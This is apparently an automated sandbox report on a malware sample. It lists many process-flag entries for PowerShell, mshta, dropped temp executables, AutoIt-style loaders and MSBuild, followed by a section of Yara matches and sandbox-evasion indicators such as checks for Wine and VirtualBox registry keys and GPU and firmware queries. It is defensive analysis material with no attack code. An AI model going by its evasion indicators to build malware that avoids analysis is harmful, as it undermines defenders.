                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe; Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\tasklist.exe; Process information set: NOOPENFILEERRORBOX (2 identical entries)
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com; Process information set: NOOPENFILEERRORBOX (2 identical entries)
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX (6 identical entries)
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com; Process information set: NOOPENFILEERRORBOX (4 identical entries)
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe; Process information set: NOOPENFILEERRORBOX (23 identical entries)
                                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX (15 identical entries)
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe; Process information set: NOOPENFILEERRORBOX (23 identical entries)
                                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX (15 identical entries)
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (78 identical entries)

                                Malware Analysis System Evasion

                                Source: Yara match; File source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara match; File source: Process Memory Space: Macromedia.com PID: 3540, type: MEMORYSTR
                                Source: Yara match; File source: Process Memory Space: AchillesGuard.com PID: 2308, type: MEMORYSTR
                                Source: Yara match; File source: Process Memory Space: MSBuild.exe PID: 1884, type: MEMORYSTR
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exe; Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_0-97965)
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe; System information queried: FirmwareTableInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe; System information queried: FirmwareTableInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe; System information queried: FirmwareTableInformation
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeFile opened: HKEY_CURRENT_USER\Software\Wine
